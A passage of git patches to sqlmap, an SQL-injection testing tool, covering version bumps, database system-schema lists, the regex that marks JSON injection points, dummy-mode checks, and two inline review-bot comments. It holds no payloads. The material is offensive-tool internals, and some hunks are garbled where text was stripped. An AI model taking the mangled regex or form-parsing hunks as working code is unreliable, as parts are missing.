https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", 
"RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") From e63b97afd6dbff7476010ba7546c757b1a0fd2bb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 00:53:16 +0100 Subject: [PATCH 084/428] Refactoring #2992 --- lib/core/settings.py | 7 ++----- txt/checksum.md5 | 2 +- 2 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bfd2b431540..720e2b42d6a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.35" +VERSION = "1.2.3.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
@@ -221,14 +221,11 @@ PLATFORM = os.name PYVERSION = sys.version.split()[0] -# DBMS sample databases -ORACLE_SAMPLE_DBS = ("BI", "HR", "OE", "OC", "PM", "IX", "SH", "SCOTT") # https://docs.oracle.com/cd/E11882_01/server.112/e10575/tdpsg_user_accounts.htm#BABHFGJF - # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") -ORACLE_SYSTEM_DBS = ORACLE_SAMPLE_DBS + ("ANONYMOUS", "APEX_PUBLIC_USER", "APEX_030200", "APPQOSSYS", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ +ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL') SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", 
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 12ac16be154..3ee084f16d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -11233011a6d1ace9d5e230c89511c235 lib/core/settings.py +8e6e1cf126bfcd8fa6f7deabf06e81c3 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 305b2aa9b519f3586daea0b6bf5be7e662cd7269 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Mar 2018 01:02:28 +0100 Subject: [PATCH 085/428] Minor update for smoke test --- lib/core/settings.py | 2 +- lib/core/testing.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 720e2b42d6a..2d969bb973f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.36" +VERSION = "1.2.3.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/core/testing.py b/lib/core/testing.py index ec53aa1de93..0330a83959b 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -17,6 +17,7 @@ from extra.beep.beep import beep from lib.controller.controller import start +from lib.core.common import checkIntegrity from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getUnicode @@ -87,6 +88,8 @@ def smokeTest(): status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + retVal &= checkIntegrity() + clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee084f16d9..9519599be6a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,11 +46,11 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8e6e1cf126bfcd8fa6f7deabf06e81c3 lib/core/settings.py +ad8c61259bd3a95c25c4b02d48bd3502 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py -72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py +a76f81b3e9e620b3e1d4bdea9160eef8 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py From 0ddc7bae66c7acfc924285388d91bd6f6a55b6a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Mar 2018 10:31:31 +0100 Subject: [PATCH 086/428] Fixes #2997 --- lib/core/common.py | 7 +++++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 5 deletions(-) 
diff --git a/lib/core/common.py b/lib/core/common.py index 3ac16fa1772..1762e5e8c59 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3928,6 +3928,9 @@ def isAdminFromPrivileges(privileges): def findPageForms(content, url, raise_=False, addToTargets=False): """ Parses given page content for possible forms + + >>> findPageForms('
    ', '') + set([(u'/input.php', 'POST', u'id=1', None, None)]) """ class _(StringIO): @@ -3950,8 +3953,6 @@ def geturl(self): try: forms = ParseResponse(response, backwards_compat=False) - except (UnicodeError, ValueError): - pass except ParseError: if re.search(r"(?i)...) -VERSION = "1.2.3.37" +VERSION = "1.2.3.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9519599be6a..da13f37c1d9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -10654e525e0740a8a0df9b1baab455d2 lib/core/common.py +bb77843791f2ca02142fee8743213671 lib/core/common.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ad8c61259bd3a95c25c4b02d48bd3502 lib/core/settings.py +86aca5c620149829e45eec160205b5dc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py From 880d709bfd28ad550b8067a19b1452aba6ec3a15 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Tue, 20 Mar 2018 10:32:47 +0100 Subject: [PATCH 087/428] Removing checkIntegrity() from smokeTest() (primarly used before commiting) --- lib/core/settings.py | 2 +- lib/core/testing.py | 3 --- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c1f6914123e..c5136ca6f12 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.38" +VERSION = "1.2.3.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/testing.py b/lib/core/testing.py index 0330a83959b..ec53aa1de93 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -17,7 +17,6 @@ from extra.beep.beep import beep from lib.controller.controller import start -from lib.core.common import checkIntegrity from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getUnicode @@ -88,8 +87,6 @@ def smokeTest(): status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) - retVal &= checkIntegrity() - clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index da13f37c1d9..30994d2365d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -46,11 +46,11 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -86aca5c620149829e45eec160205b5dc lib/core/settings.py +0e552878afbf998e3eaa913dee384aa9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py -a76f81b3e9e620b3e1d4bdea9160eef8 lib/core/testing.py +72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py af2d1810b6a7ebc61689a53c253ddbaa lib/core/update.py From 4fc7fc6447a3e5846e6cc6f92e34818cb657827b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Mar 2018 11:32:31 +0100 Subject: [PATCH 088/428] Patch for an Issue #2943 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c5136ca6f12..8d6eb2c5952 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.39" +VERSION = "1.2.3.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index ab1aa2f6b9c..98d0de3b9da 100644 --- a/lib/core/target.py +++ b/lib/core/target.py 
@@ -142,7 +142,7 @@ def process(match, repl): if not (kb.processUserMarks and kb.customInjectionMark in conf.data): conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]*)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*".+?)"(?%s"' % kb.customInjectionMark), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30994d2365d..2e52146ef42 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,10 +46,10 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0e552878afbf998e3eaa913dee384aa9 lib/core/settings.py +36c768f8c13856d626fc96a08e9e6098 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -12f8c42ed742581644f6476a7d80dcf8 lib/core/target.py +a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 7d5a0ed2dc18dca6900bd5dabbc4fbd04ba48cc5 Mon Sep 17 00:00:00 2001 
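Review bot: The first `re.sub` now uses `".+?` where the old pattern had `"[^"]*`, so an empty JSON string value (`"key": ""`) no longer matches and that parameter stops receiving the custom injection mark; `[^"]*` also spanned newlines, which `.` does not without `re.S`. If excluding empty values is not intended, `".*?` keeps the old reach while retaining the lazy match. The tail of the new pattern after `"(?` and the `(?P<...>` group name are lost in this rendering, so I cannot confirm the terminating condition that replaced the closing `"`; please double-check it against the three sibling `re.sub` calls. `process` and the enclosing function start outside the hunk.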
From: Miroslav Stampar Date: Wed, 21 Mar 2018 14:22:59 +0100 Subject: [PATCH 089/428] Use false-positive checks in dummy mode --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index b8e54cfe946..498a70009f3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -686,7 +686,7 @@ def genCmpPayload(): kb.previousMethod = method - if conf.dummy or conf.offline: + if conf.offline: injectable = False # If the injection test was successful feed the injection diff --git a/lib/core/settings.py b/lib/core/settings.py index 8d6eb2c5952..a2be2c0816f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.40" +VERSION = "1.2.3.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2e52146ef42..af24e3634ca 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -e15cd43d7bd71d04990494d13897c490 lib/controller/checks.py +8418f90f8d898b58fe25ec9153977849 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 
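Review bot: Dropping `conf.dummy` from the guard means a dummy run can now leave `injectable` set and fall through to the false-positive checks further down, which is the commit's stated intent but is not recorded at the site, so the bare `if conf.offline:` reads like an oversight next to the `conf.dummy or conf.offline` pattern it replaces. A one-line comment, `# offline mode never marks a parameter injectable; dummy mode deliberately falls through so the false-positive checks below are exercised`, would capture the reason. The enclosing function starts before and continues after the hunk.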
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -36c768f8c13856d626fc96a08e9e6098 lib/core/settings.py +4a6fafc241853910a0dbf4ce74f98da9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py From f287ff376778d98ebc7d0d36f090756a84add153 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 21 Mar 2018 14:29:54 +0100 Subject: [PATCH 090/428] Trivial comment update --- lib/controller/checks.py | 4 ++-- lib/core/common.py | 2 +- lib/core/convert.py | 2 +- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- lib/utils/search.py | 2 +- txt/checksum.md5 | 12 ++++++------ 7 files changed, 13 insertions(+), 13 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 498a70009f3..06a395bcaee 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1569,8 +1569,8 @@ def checkInternet(): content = Request.getPage(url=CHECK_INTERNET_ADDRESS, checking=True)[0] return CHECK_INTERNET_VALUE in (content or "") -def setVerbosity(): # Cross-linked function +def setVerbosity(): # Cross-referenced function raise NotImplementedError -def setWafFunctions(): # Cross-linked function +def setWafFunctions(): # Cross-referenced function raise NotImplementedError diff --git a/lib/core/common.py b/lib/core/common.py index 1762e5e8c59..a4898e25508 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -2662,7 +2662,7 @@ def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None): dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep)) dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep)) -def getPageTemplate(payload, place): # Cross-linked function +def getPageTemplate(payload, place): # Cross-referenced function raise NotImplementedError @cachedmethod diff --git a/lib/core/convert.py b/lib/core/convert.py index 7240655ef1a..fcd0d277c71 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -174,7 +174,7 @@ def htmlunescape(value): pass return retVal -def singleTimeWarnMessage(message): # Cross-linked function +def singleTimeWarnMessage(message): # Cross-referenced function sys.stdout.write(message) sys.stdout.write("\n") sys.stdout.flush() diff --git a/lib/core/settings.py b/lib/core/settings.py index a2be2c0816f..20ae2b99e32 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.41" +VERSION = "1.2.3.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 4f2defc2856..df045c3cf4d 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1279,5 +1279,5 @@ def _randomizeParameter(paramString, randomParameter): else: return comparison(page, headers, code, getRatioValue, pageLength) -def setHTTPHandlers(): # Cross-linked function +def setHTTPHandlers(): # Cross-referenced function raise NotImplementedError diff --git a/lib/utils/search.py b/lib/utils/search.py index c660d4aee47..0d6e770b702 100644 --- a/lib/utils/search.py +++ b/lib/utils/search.py 
@@ -187,5 +187,5 @@ def search(dork): finally: kb.redirectChoice = popValue() -def setHTTPHandlers(): # Cross-linked function +def setHTTPHandlers(): # Cross-referenced function raise NotImplementedError diff --git a/txt/checksum.md5 b/txt/checksum.md5 index af24e3634ca..7495cd4e1a5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,14 +21,14 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -8418f90f8d898b58fe25ec9153977849 lib/controller/checks.py +6f0db0b505eec576e28d97cced3ad338 lib/controller/checks.py 33689bb1b064d4eebc216934795a595f lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -bb77843791f2ca02142fee8743213671 lib/core/common.py -1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py +58312f5c2f252145ec4aed01bc7952a0 lib/core/common.py +0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a6fafc241853910a0dbf4ce74f98da9 lib/core/settings.py +30b479368e2a9d72b055753ef3a5a740 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py a35efa7bec9f1e6cedf17c9830a79241 lib/core/target.py 
@@ -68,7 +68,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 53c38db67dd4b14fbceee71e4748f874 lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -b51c3f8b5cc65c6d7c81471577afd87d lib/request/connect.py +bf97dd285be3cc341233a9f4e09137f8 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py @@ -111,7 +111,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py -4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py +fb6cf3415fbbf117e2dc87aae2f35993 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py From c6c1ac02bb412916b61b8325e1b333a798de8d3a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Mar 2018 15:07:43 +0200 Subject: [PATCH 091/428] Patch related to the #3009 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 63582f5d995..902f702b451 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2359,7 +2359,7 @@ def _checkTor(): logger.info(infoMsg) try: - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + page, _, _ = Request.getPage(url="https://check.torproject.org/", referer=None, raise404=False) except SqlmapConnectionException: page = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 20ae2b99e32..76fc6700cec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.42" +VERSION = "1.2.3.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7495cd4e1a5..b056b99ec68 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -b7c3e98e5400d73e9ce5c1a30145f7c6 lib/core/option.py +838f38559c01a690cc04620cb15692ab lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 